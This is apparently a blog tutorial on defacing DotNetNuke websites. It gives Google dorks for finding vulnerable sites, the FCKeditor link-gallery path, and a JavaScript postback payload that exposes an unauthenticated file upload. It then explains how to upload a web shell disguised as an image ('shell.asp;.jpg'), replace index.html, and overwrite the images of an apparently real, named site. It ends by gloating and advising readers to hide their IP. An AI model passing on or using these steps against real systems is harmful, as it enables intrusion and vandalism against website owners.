Step 1 :goto google
Step 2:Now enter this dork (this is Dork to find DNN Vulnerable sites)
inurl:/Fck/fcklinkgallery.aspx
or inurl:"/portals/0"
or
inurl:tabid/176/Default.aspx
these r dorks to find the Portal Vulnerable sites.
Step 3:
now you will get a huge list of DNN websites but the main part it to get a vulnerable website which can be defaced because now very less websites r lest vulnerable othewise this vulnerability issue have been fixed ny dot net nuke.
Step 4:
For example i have got a website .
Step 5:Now Paste after the site url
this/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspxNow Site is this :
so it will look like this (screenshot above)
Note: if it will show you like this (see screenshot below) its mn site could not be find another site
Now Click onFile ( A File On Your Site )
Step 8:Now replace the URL in the address bar with this java Script
javascript:__doPostBack('ctlURL$cmdUpload','')Step 9:You will Find the Upload Option to upload files on website. Step 10:
Select Root of the website.
Step 11:
Upload yourshell download from here
After uploading shell.asp;.jpg
go for your shell www.yoursite.com/portals/0/yourshellname.asp;.jpg
so you after uploading shell and shell is front of you look like this (screenshot below)
Click on<Dir>...again and again till you will see admin ar
now it will show u admin ar where u can upload ur pages to main root directory ie c:/
now to replace the original index.html to put ur deface page, u have to copy the of deface page nd paste by editing index.html [this will be done in Admin dir]
NOW lets move to the most tricky part of the tutorial, and u can say it is the most intresting part because it is very very difficault to find the website which can allow to upload our shell so , lets do somthing intresting . we can upload s sily on website now follow this simple steps to change the original s of website to our ....;-)..:DD
Step 1:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
now select a foder which is containg the which is on the the front page ofwebsite. let me take this website for an example:
http://www.npl-landcare.com/
Step 2:
now i found the front of the website in this portal:
http://www.npl-landcare.com/Portals/0/Thornton-Alls/hillhouse_350a.jpg
first u save the with the same name nd format
now edit the as u want it to be shown.
now upload this to the portal in which it is stored
for ex i have :
Portals/0/Thornton-Alls/
step 3:
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
now u will finde the option to upload
upload ur nd now goto the main page of the website.
mine is
http://www.npl-landcare.com/NProup/NPLLandcare/tabid/81/Default.aspx
lolzzz..... security brcheddd....hahaha.
this trick will work in many sites soo njoyy websitess
thnxx for rding this tutorial made by Devendra
caution:1. only for eduional purpose .
2. use proxy,vpn. ..in short hide ur ip. :)
No comments:
Post a Comment